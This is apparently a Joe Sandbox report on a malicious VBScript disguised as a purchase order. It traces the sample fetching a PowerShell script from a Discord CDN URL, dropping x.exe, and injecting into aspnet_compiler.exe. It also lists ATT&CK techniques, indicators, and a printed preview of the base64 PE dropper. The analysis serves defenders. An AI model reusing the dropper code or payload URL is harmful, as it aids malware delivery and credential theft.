          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010864AB mov eax, dword ptr fs:[00000030h]5_2_010864AB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B34B0 mov eax, dword ptr fs:[00000030h]5_2_010B34B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010B44B0 mov ecx, dword ptr fs:[00000030h]5_2_010B44B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011554DB mov eax, dword ptr fs:[00000030h]5_2_011554DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010804E5 mov ecx, dword ptr fs:[00000030h]5_2_010804E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_011294E0 mov eax, dword ptr fs:[00000030h]5_2_011294E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01085702 mov eax, dword ptr fs:[00000030h]5_2_01085702
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01085702 mov eax, dword ptr fs:[00000030h]5_2_01085702
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_01087703 mov eax, dword ptr fs:[00000030h]5_2_01087703
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 5_2_010BC700 mov eax, dword ptr fs:[00000030h]5_2_010BC700
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 162.159.129.233 443Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 98F008Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.1996937641.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.1997479679.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information221
          Scripting
          Valid Accounts1
          Exploitation for Client Execution
          221
          Scripting
          411
          Process Injection
          1
          Masquerading
          OS Credential Dumping21
          Security Software Discovery
          Remote Services11
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          PowerShell
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Disable or Modify Tools
          LSASS Memory1
          Process Discovery
          Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion
          Security Account Manager41
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
          Obfuscated Files or Information
          Cached Domain Credentials12
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Timestomp
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          DLL Side-Loading
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574269 Sample: PO_11171111221.Vbs.vbs Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 33 cdn.discordapp.com 2->33 45 Suricata IDS alerts for network traffic 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 5 other signatures 2->51 9 wscript.exe 16 2->9         started        signatures3 process4 dnsIp5 35 cdn.discordapp.com 162.159.129.233, 443, 49730 CLOUDFLARENETUS United States 9->35 29 C:\Temp\dddddd.ps1, ASCII 9->29 dropped 53 System process connects to network (likely due to code injection or exploit) 9->53 55 VBScript performs obfuscated calls to suspicious functions 9->55 57 Wscript starts Powershell (via cmd or directly) 9->57 59 2 other signatures 9->59 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 31 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->31 dropped 61 Found suspicious powershell code related to unpacking or dynamic code loading 14->61 63 Powershell drops PE file 14->63 18 x.exe 3 14->18         started        21 conhost.exe 14->21         started        23 conhost.exe 14->23         started        signatures10 process11 signatures12 37 Antivirus detection for dropped file 18->37 39 Machine Learning detection for dropped file 18->39 41 Writes to foreign memory regions 18->41 43 2 other signatures 18->43 25 aspnet_compiler.exe 18->25         started        27 aspnet_compiler.exe 18->27         started        process13

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PO_11171111221.Vbs.vbs14%VirustotalBrowse
          PO_11171111221.Vbs.vbs8%ReversingLabsScript-WScript.Trojan.Heuristic
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\x.exe100%AviraTR/Dropper.Gen
          C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          cdn.discordapp.com
          162.159.129.233
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://cdn.discordapp.com/attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&is=675b7ec4&hm=5608089203d1f55754eb42ae1b19e52da07e426935e063abf1f2bb096cfc394e&false
              high
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://cdn.discordapp.com/attacwscript.exe, 00000000.00000002.1789139746.00000163D4455000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1763331017.000001EFD100D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1728136588.000001EFC26FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://oneget.orgXpowershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://cdn.discordapp.com/wscript.exe, 00000000.00000003.1785984248.00000163D4375000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://cdn.discordapp.com/attachments/1295304757166080020/1316923696224669696/fore.ps1?ex=675cd044&wscript.exe, 00000000.00000002.1789200260.00000163D6122000.00000004.00000020.00020000.00000000.sdmp, PO_11171111221.Vbs.vbsfalse
                                      high
                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1728136588.000001EFC0F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://cdn.discordapp.com/attachments/129530475716608wscript.exe, 00000000.00000003.1708120120.00000163D6330000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://cdn.discordapp.com/attachments/1295304757166080020/1316923696wscript.exe, wscript.exe, 00000000.00000003.1708120120.00000163D6330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1789200260.00000163D6120000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707617251.00000163D6124000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707941021.00000163D6124000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1728136588.000001EFC0F91000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1728136588.000001EFC2583000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://oneget.orgpowershell.exe, 00000001.00000002.1728136588.000001EFC2197000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  162.159.129.233
                                                  cdn.discordapp.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1574269
                                                  Start date and time:2024-12-13 07:50:11 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 5m 17s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:PO_11171111221.Vbs.vbs
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winVBS@11/7@1/1
                                                  EGA Information:
                                                  • Successful, ratio: 66.7%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 33
                                                  • Number of non-executed functions: 224
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs
                                                  • Stop behavior analysis, all processes terminated
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe
                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target powershell.exe, PID 1216 because it is empty
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  TimeTypeDescription
                                                  01:51:07API Interceptor5x Sleep call for process: powershell.exe modified
                                                  01:51:32API Interceptor3x Sleep call for process: aspnet_compiler.exe modified
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  162.159.129.233Cheat_Lab_2.7.2.msiGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/1175364766026436628/1175364839565176852/2
                                                  Cheat.Lab.2.7.1.msiGet hashmaliciousRedLineBrowse
                                                  • cdn.discordapp.com/attachments/1166694372084027482/1169541101917577226/2.txt
                                                  QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                  • cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                                                  SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  • cdn.discordapp.com/attachments/956928735397965906/1004544301541363733/bantylogger_dhBqf163.bin
                                                  64AE5410F978DF0F48DCC67508820EA230C566967E002.exeGet hashmaliciousDCRatBrowse
                                                  • cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  http://162.159.129.233Get hashmaliciousUnknownBrowse
                                                  • 162.159.129.233/favicon.ico
                                                  2lfV6QiE6j.exeGet hashmaliciousUnknownBrowse
                                                  • cdn.discordapp.com/attachments/937614907917078588/937618926945329213/macwx.log
                                                  SecuriteInfo.com.Trojan.Siggen15.38099.19640.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/878034206570209333/908810886561534042/slhost.exe
                                                  1PhgF7ujwW.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/878382243242983437/879280740578263060/FastingTabbied_2021-08-23_11-26.exe
                                                  vhNyVU8USk.exeGet hashmaliciousAmadeyBrowse
                                                  • cdn.discordapp.com/attachments/837741922641903637/866064264027701248/svchost.exe
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  cdn.discordapp.comWO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                  • 162.159.129.233
                                                  sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                  • 162.159.134.233
                                                  EsgeCzT4do.exeGet hashmaliciousXWormBrowse
                                                  • 162.159.129.233
                                                  file.exeGet hashmaliciousUnknownBrowse
                                                  • 162.159.135.233
                                                  file.exeGet hashmaliciousCStealerBrowse
                                                  • 162.159.134.233
                                                  https://cdn.discordapp.com/attachments/1284277835762110544/1305291734967779460/emu.exe?ex=67327f28&is=67312da8&hm=ea20e1c2a609dc1a0569bd4abb7e0da0a5e0671f3f7a388c1ed138f806c8e0c4&Get hashmaliciousUnknownBrowse
                                                  • 162.159.135.233
                                                  SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeGet hashmaliciousXmrigBrowse
                                                  • 162.159.135.233
                                                  segura.vbsGet hashmaliciousRemcosBrowse
                                                  • 162.159.135.233
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                  • 162.159.129.233
                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Quasar, StealcBrowse
                                                  • 162.159.134.233
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CLOUDFLARENETUSgreatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 104.21.84.67
                                                  goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                  • 104.21.31.249
                                                  creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 104.21.84.67
                                                  https://link.mail.beehiiv.com/ls/click?upn=u001.R74aO5UQ-2FrUOGP4XJV77OKQT1NAU9BwQ6OP1zvOna2j3qRTjcdTYAqprTXNbU1vrKPOdnlpDlbO1ohrNKAkzUmdLI4l19yBq8cKvYb8dsNKK6IsO0404WADpCgMHJK-2BM7ePj1I7t27EBUyeaiqRuwqngyTjrFDMwzKEm6VF8ExY0iFbvMWKjDk4Y7upRdq5sSY4nXTsFeij7Q5E2ydkS65V1Y39RLDjY80Udth17NgVFYK9r3RCAH09UYk2CIjxFd5I9_j6TOopR0rmB-2FAe-2FAtMIxxpgCP1uVymDZ2Ai3kvTmy94R9Cva2dqhTbcrX0jwqqIbWEZoY75Qxv0d-2Fi-2BJ58G8TpFK32hJ3Y6KvVmw024fgWikUvw7JSpe1p1AxJouHIwzH-2B4WSy6DMsQxGcoT2TOfGxh3ObD4vtK9CAXwy7Cjhf2-2FwG571nv3bia-2F44CMLr9lsCQcs3SwvYIDQ24Nq6VfvIfUFJ9nNyI7I5MS5J8-2Bg5rLnAjlWoLmJBScJaNhqffuqYHWE3BYOKju8i7o1wD6Pw-2Fs92sFC2Mh7Oi9oheY1ZKD714qAu5jG5ZYhyhfMgCcuyNvp15ZI4Srd3AOfDL686JQJNBXoqAuLGHc3y6muY0dxN9oNJrp8vksovnjs-2Be8S30MoUUfcAPp8UPZjIomKd3EBkrVIa3k8AgkBS-2BZFp3F1x23PdTLWCU-2BZmxkQxWtGet hashmaliciousUnknownBrowse
                                                  • 104.21.90.56
                                                  https://link.mail.beehiiv.com/ls/click?upn=u001.8ULyQR0JYqJFmtAcEKOwZJrtx6Pg-2FFIdL75Xr8cQplPy1BwMP6K04UCj8Y6BqsqIO5QCbkskm97LegF2duW8h-2B7y0wF2E-2BDZNcbzCPIVszT1GD6EOVy0YRZV55MI3rlD0kPZAiaJ0IK1-2FMU2lgPk2Kii32mX86fkDuIDK9GPx4-2FfuyI6JAqdMrtQqIbvs2W-2F-2BIG8MDRxPU9Yn0AWIxVL0SnsGrwak4PiVtMHHZHgth0QvNVoRM6ZTwXBytJNkde3jx-2F-2Fb-2FvT1Ap71VQ1QzJzKA-3D-3DWb3t_K8Qrv2qBC50DA374Af0scmFKIlSM-2Bv5ewezTCdQ-2FHdeUjmHtY3NrJD1TBTC8B4zB5HyIT-2F4sQexLT4eDcDNpHTw1Uv6zyerCF2l6Qv2QnUXIFi1vgFIVZbyXm-2Fb4OHwN5YbpoyTJNqIBeZHgSrlo7M6ZizbyF9nigOzGQDcMUgYHM7Aiblgmi6ZZqeS-2F4eQTcSMrquYcXkgDnpAgjrAXvqys7q9tGDujdSY7rWu7e2v-2B8ZqylkvKbnTnsoe7xpWX2CCdK7-2Ffs69cITr47FLMcG63ztEATsgzr65zgaz1vTV637p-2F932w2jeo6Q6M5CBc8nQ-2BvnbtLXdWgwvebkWZFeKaDHxfFr3YWnPUF1sWMZ4N238r82opSIcsBiifBW-2Fr-2FX6QykqaNBEmm5OGxvGQOo2rDQ3a45-2FO4v08XQIdNTDu5CkpvASiHt5MqJZ9OHD4Get hashmaliciousUnknownBrowse
                                                  • 104.21.90.56
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 104.21.35.43
                                                  http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
                                                  • 172.67.196.220
                                                  https://grupoescobar.com.br/AA/auth.html#yk.cho@hdel.co.krGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.25.14
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 172.67.139.78
                                                  CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                  • 104.21.34.183
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 162.159.129.233
                                                  CMR ART009.docxGet hashmaliciousUnknownBrowse
                                                  • 162.159.129.233
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 162.159.129.233
                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 162.159.129.233
                                                  WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                  • 162.159.129.233
                                                  0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                                  • 162.159.129.233
                                                  c2.htaGet hashmaliciousXWormBrowse
                                                  • 162.159.129.233
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 162.159.129.233
                                                  510005940.docx.docGet hashmaliciousUnknownBrowse
                                                  • 162.159.129.233
                                                  update.jsGet hashmaliciousUnknownBrowse
                                                  • 162.159.129.233
                                                  No context
                                                  Process:C:\Windows\System32\wscript.exe
                                                  File Type:ASCII text, with very long lines (65494), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):449316
                                                  Entropy (8bit):5.978461339679047
                                                  Encrypted:false
                                                  SSDEEP:12288:Gpc42e4IlGV38d4wLD0uMjh/hWaGGFT1/gZz:+cDe4J8d4wnjMV/MGFY
                                                  MD5:A71B01EF9FB1E8252D07F776432A39DE
                                                  SHA1:6A00FECFE8CDF15A8C5A62FDE645D691000A9D46
                                                  SHA-256:12CF3C330193F494DEE36340D31CB9EE1897365FA8280065C6B397230A7488E2
                                                  SHA-512:0DDB623E0EB1E0D1DAC0DFAD4209C3A5BD69C17A071E71461DCEAA23C5BB6B309C58762CBF33637BE7D66808160E9358D5519D3B92A31CD1A7FE7B6D362F96A4
                                                  Malicious:true
                                                  Reputation:low
                                                  Preview:$p=[IO.Path]::Combine($env:TEMP,"x.exe")..[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAEbNCaYAAAAAAAAAAOAAIgALATAAABoFAAAIAAAAAAAA7jkFAAAgAAAAQAUAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACABQAAAgAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAJg5BQBTAAAAAEAFALYFAAAAAAAAAAAAAAAAAAAAAAAAAGAFAAwAAAA4OQUAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAA9BkFAAAgAAAAGgUAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAALYFAAAAQAUAAAYAAAAcBQAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAFAAACAAAAIgUAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADQOQUAAAAAAEgAAAACAAUASMcEAPBxAAADAAIAQAAABpDGBAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKCTdLK/CJNf3hN50slzq12meu4CN+hc870snKgS2+3THdUz46/4l34IKbgTS1NvC1oZbVYvKZ2zapEj9yj4n7VxIqkDpwCLL324u9/H7o4ihHl6T
                                                  Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                  File Type:CSV text
                                                  Category:dropped
                                                  Size (bytes):226
                                                  Entropy (8bit):5.360398796477698
                                                  Encrypted:false
                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                  MD5:3A8957C6382192B71471BD14359D0B12
                                                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
